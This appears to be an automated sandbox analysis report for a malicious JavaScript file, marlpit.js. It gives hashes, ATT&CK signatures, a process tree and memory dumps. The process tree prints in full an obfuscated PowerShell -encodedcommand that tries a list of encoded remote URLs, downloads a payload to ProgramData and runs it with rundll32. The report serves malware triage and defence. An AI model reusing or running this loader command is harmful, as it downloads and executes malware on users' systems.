23d1aa73ac67b5924f3d7914701d5b29ceaed6a5b7e67042f6ca6f009c82ec3f

General

Target

marlpit.js
Size

253KB
MD5

e236f44e121b8cdf595f86b297d81eb6
SHA1

d3f4d9dde5d16644e83dd4c9536091fc2478b1e5
SHA256

23d1aa73ac67b5924f3d7914701d5b29ceaed6a5b7e67042f6ca6f009c82ec3f
SHA512

33a778d93a4f467e91623654d17494a5b1a3d8a9ddf56690e159456d9eb1996a1cae4ae9dca0d6454abf927b2b53cba63a6dc73a18b329f2fee6c9c2c80a048a
SSDEEP

3072:XVCR9n8qrKy8948Tco5sfNWWG/uzi5hPdzmoC8e/Ih7pwRk:wR+ZyD8Io5sfNWW/i5Pqog/ipf

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
324	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	324	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1488 wrote to memory of 380	1488	wscript.exe	27
PID 1488 wrote to memory of 380	1488	wscript.exe	27
PID 1488 wrote to memory of 380	1488	wscript.exe	27
PID 380 wrote to memory of 324	380	wscript.exe	28
PID 380 wrote to memory of 324	380	wscript.exe	28
PID 380 wrote to memory of 324	380	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\marlpit.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1488
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" "C:\ProgramData\preinheritanceShabbier.js" quersprungBellworts EpanisognathousImpleader scrabbles
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:380
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABUAGEAbgBuAGkAbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAYwBBAEIAcABBAEgASQBBAGIAdwBCAGoAQQBHAGcAQQBZAFEAQgBsAEEASABRAEEAWQBRAEIAcwBBAEcAVQBBAGMAdwBCAFEAQQBIAEkAQQBiAHcAQgBrAEEASABVAEEAWQB3AEIAMABBAEcAawBBAFkAZwBCAHAAQQBHAHcAQQBhAFEAQgAwAEEASABrAEEATABnAEIAaQBBAEcAVQBBAFoAUQBCAHkAQQBBAD0APQAiADsAJABhAGMAcQB1AGkAcgBhAGIAaQBsAGkAdAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATgBnAEEAdQBBAEQAawBBAE8AQQBBAHUAQQBEAEUAQQBOAEEAQQAwAEEAQwA0AEEATQBRAEEANABBAEQAWQBBACIAOwAkAG0AeQBvAGQAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQB3AEEAdQBBAEQARQBBAE4AZwBBAHcAQQBDADQAQQBNAFEAQQAwAEEARABNAEEATABnAEEAeABBAEQAZwBBAE4AUQBBAHYAQQBEAFEAQQBUAGcAQgB1AEEARwBNAEEAZQBBAEEAdgBBAEQASQBBAGMAZwBCAFgAQQBEAGMAQQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAZwBBAE0AZwBBAHUAQQBEAGcAQQBOAHcAQQB1AEEARABVAEEATwBRAEEAdQBBAEQARQBBAE4AZwBBAHgAQQBDADgAQQBRAFEAQgBuAEEARwBRAEEAUwBnAEEAMQBBAEMAOABBAGQAUQBCAGEAQQBHAGMAQQBSAEEAQgBUAEEAQQA9AD0APQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQgBYAEEARgBVAEEAYQBnAEIAMwBBAEgAZwBBAGMAQQBBAD0APQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARQB3AEEAWgBBAEIAdgBBAEQAZwBBAFcAZwBBADQAQQBEAFEAQQBUAGcAQgBRAEEARwBZAEEAUQBnAEIAWgBBAEEAPQA9AD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEAdwBBAEQAUQBBAEwAdwBCAFUAQQBFAHcAQQBSAHcAQgBvAEEARQA0AEEAWgBBAEEAdgBBAEcAWQBBAGMAdwBCAHEAQQBHAEUAQQBhAGcAQgBsAEEARwBJAEEAYgB3AEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABiAGkAYwB1AHMAcABpAGQAcwBOAGUAdQByAGEAcABvAHAAaAB5AHMAZQBhAGwAIABpAG4AIAAkAG0AeQBvAGQAZQBzACAALQBzAHAAbABpAHQAIAAiAD0AIgApACAAewB0AHIAeQAgAHsAJABkAHUAdABjAGgAZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBOAEEAQQB1AEEARABJAEEATQBnAEEAeQBBAEMANABBAE0AUQBBADIAQQBEAEUAQQBMAGcAQQB5AEEARABJAEEATgBnAEEAPQBHAG8AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB0AEEARwBrAEEAWQB3AEIAeQBBAEcAOABBAFkAZwBCAHAAQQBIAFUAQQBiAFEAQQB1AEEARwBFAEEAWQB3AEIAMABBAEcAOABBAGMAZwBBAD0AIgA7ACQAUwBsAHUAZABnAGUAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGkAYwB1AHMAcABpAGQAcwBOAGUAdQByAGEAcABvAHAAaAB5AHMAZQBhAGwAKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABTAGwAdQBkAGcAZQByACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGcAbwBlAHQAaABpAHQAZQBzAC4AdABvAHMAdABpAGMAYQB0AGUAZABPAHUAdABsAG8AcgBkADsAJABzAHAAcgBhAGkAbgBpAG4AZwBIAGkAZQByAG8AbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AUQBBADEAQQBDADQAQQBNAFEAQQB4AEEARABFAEEATABnAEEAeQBBAEQATQBBAE4AdwBBAHUAQQBEAEkAQQBNAGcAQQB4AEEAQQA9AD0AIgA7ACQAUgBhAHMAaABlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGkAQQBHAHcAQQBZAFEAQgBrAEEARwBVAEEAYwBnAEEAdQBBAEcATQBBAFkAUQBCAHoAQQBHAGcAQQB2AGwAUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABFAEEATgBnAEEAMgBBAEMANABBAE0AUQBBADMAQQBEAE0AQQBMAGcAQQB4AEEARABBAEEATQBBAEEAPQB2AGwAUABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFUAQQBiAGcAQgBrAEEARwBVAEEAYwBnAEIAbQBBAEcAdwBBAFoAUQBCAGwAQQBHAE0AQQBaAFEAQgBGAEEARwBNAEEAZABBAEIAdgBBAEcAUQBBAFoAUQBCAHkAQQBHADAAQQBiAHcAQgBwAEEARwBRAEEAWQBRAEIAcwBBAEMANABBAGMAdwBCAGwAQQBIAGcAQQBlAFEAQQA9AHYAbABQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAQQBBAEwAZwBBAHgAQQBEAGMAQQBOAHcAQQB1AEEARABZAEEATQBBAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBBAD0APQAiADsAJABoAGUAbABpAHAAbwByAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBkAEEAQgB2AEEASABJAEEAWgBRAEIAbABBAEcANABBAEwAZwBCAGoAQQBHADgAQQBkAFEAQgB5AEEASABNAEEAWgBRAEIAegBBAEEAPQA9AGcAVQBWAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVgBBAEcANABBAFkAUQBCAHQAQQBHAFUAQQBiAGcAQgBrAEEARwBrAEEAYgBnAEIAbgBBAEUAOABBAGMAZwBCAGgAQQBHADQAQQBaAHcAQgBsAEEARwBFAEEAWgBBAEIAbABBAEgATQBBAEwAZwBCAHcAQQBHAEUAQQBjAGcAQgAwAEEASABNAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZwBvAGUAdABoAGkAdABlAHMALgB0AG8AcwB0AGkAYwBhAHQAZQBkAE8AdQB0AGwAbwByAGQAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADkAMAAxADgANQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEcAYwBBAGIAdwBCAGwAQQBIAFEAQQBhAEEAQgBwAEEASABRAEEAWgBRAEIAegBBAEMANABBAGQAQQBCAHYAQQBIAE0AQQBkAEEAQgBwAEEARwBNAEEAWQBRAEIAMABBAEcAVQBBAFoAQQBCAFAAQQBIAFUAQQBkAEEAQgBzAEEARwA4AEEAYwBnAEIAawBBAEMAdwBBAFkAZwBCAHAAQQBHADQAQQBaAEEAQQA3AEEAQQA9AD0AIgA7ACQAUABsAHUAdABvAGMAcgBhAHQATABpAHYAZQByAGgAZQBhAHIAdABlAGQAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCAHAAQQBHAHcAQQBkAEEAQgBwAEEARwBZAEEAYQBRAEIAbABBAEcAUQBBAFUAdwBCADEAQQBHAEkAQQBaAEEAQgAxAEEARwBFAEEAYgBBAEIAegBBAEMANABBAFoAQQBCAGwAQQBHAEUAQQBiAEEAQgB6AEEAQQA9AD0AcwBYAHcARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAFUAQQBkAEEAQgBwAEEARwBRAEEAYgBBAEIANQBBAEYAawBBAFoAUQBCAGgAQQBIAEkAQQBiAEEAQgBwAEEARwBVAEEAYwB3AEEAdQBBAEcAbwBBAGIAdwBCAGkAQQBIAFUAQQBjAGcAQgBuAEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:324

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\preinheritanceShabbier.js

Filesize
253KB

MD5
e236f44e121b8cdf595f86b297d81eb6

SHA1
d3f4d9dde5d16644e83dd4c9536091fc2478b1e5

SHA256
23d1aa73ac67b5924f3d7914701d5b29ceaed6a5b7e67042f6ca6f009c82ec3f

SHA512
33a778d93a4f467e91623654d17494a5b1a3d8a9ddf56690e159456d9eb1996a1cae4ae9dca0d6454abf927b2b53cba63a6dc73a18b329f2fee6c9c2c80a048a

Download Submit
memory/324-60-0x000000001B2D0000-0x000000001B5B2000-memory.dmp

Filesize
2.9MB

Download
memory/324-61-0x0000000001DD0000-0x0000000001DD8000-memory.dmp

Filesize
32KB

Download
memory/324-62-0x0000000002090000-0x0000000002110000-memory.dmp

Filesize
512KB

Download
memory/324-63-0x0000000002090000-0x0000000002110000-memory.dmp

Filesize
512KB

Download
memory/324-64-0x0000000002090000-0x0000000002110000-memory.dmp

Filesize
512KB

Download
memory/324-65-0x0000000002090000-0x0000000002110000-memory.dmp

Filesize
512KB

Download
memory/324-66-0x0000000002090000-0x0000000002110000-memory.dmp

Filesize
512KB

Download
memory/324-67-0x0000000002090000-0x0000000002110000-memory.dmp

Filesize
512KB

Download
memory/324-68-0x0000000002090000-0x0000000002110000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing